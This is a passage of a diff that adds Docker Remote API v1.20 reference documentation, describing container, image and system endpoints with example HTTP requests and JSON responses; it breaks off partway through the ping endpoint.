+`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. 
+- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
+ +**Example request**: + + GET /v1.20/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "network" : { + "rx_dropped" : 0, + "rx_bytes" : 648, + "rx_errors" : 0, + "tx_packets" : 8, + "tx_dropped" : 0, + "rx_packets" : 8, + "tx_errors" : 0, + "tx_bytes" : 648 + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu 
usage percent. It is not an exact copy of the `cpu_stats` field.
+
+**Query parameters**:
+
+- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+- **200** – no error
+- **404** – no such container
+- **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize?h=&w=`
+
+Resize the TTY for container with  `id`. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.20/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+- **h** – height of `tty` session
+- **w** – width
+
+**Status codes**:
+
+- **200** – no error
+- **404** – No such container
+- **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+ +**Example request**: + + POST /v1.20/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. 
+ +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.20/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.20/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. 
+- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. 
+ +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.20/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.20/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.20/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. 
+ Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.20/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. 
+
+**Example request**:
+
+    GET /v1.20/containers/8cce319429b2/archive?path=/root HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+    X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0=
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+On success, a response header `X-Docker-Container-Path-Stat` will be set to a
+base64-encoded JSON object containing some filesystem header information about
+the archived resource. The above example value would decode to the following
+JSON object (whitespace added for readability):
+
+```json
+{
+  "name": "root",
+  "size": 4096,
+  "mode": 2147484096,
+  "mtime": "2014-02-27T20:51:23Z",
+  "linkTarget": ""
+}
+```
+
+A `HEAD` request can also be made to this endpoint if only this information is
+desired.
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    - no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+  to extract the archive's contents into. Required.
+
+  If not an absolute path, it is relative to the container's root directory.
+  The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.20/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.20/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest 
information**: + + GET /v1.20/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. 
Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.20/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. 
If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. 
hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.20/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. +- **repo** – Repository name. +- **tag** – Tag. If empty when pulling an image, this causes all tags + for the given image to be pulled. 
+ +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.20/images/ubuntu/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Created": "2013-03-23T22:24:18.818426-07:00", + "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0", + "ContainerConfig": { + "Hostname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": true, + "OpenStdin": true, + "StdinOnce": false, + "Env": null, + "Cmd": ["/bin/bash"], + "Dns": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": null, + "VolumesFrom": "", + "WorkingDir": "" + }, + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Parent": "27cf784147099545", + "Size": 6824592 + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.20/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) 
MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+- **200** – no error
+- **404** – no such image
+- **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.20/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`. This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+**Example request**:
+
+    POST /v1.20/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+- **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+- **X-Registry-Auth** – base64-encoded AuthConfig object.
+ +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.20/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.20/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. 
+ +**Example request**: + + GET /v1.20/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.20/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.20/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Containers": 11, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + 
"MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SwapLimit": false, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.20/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.20", + "Experimental": false + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.20/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: 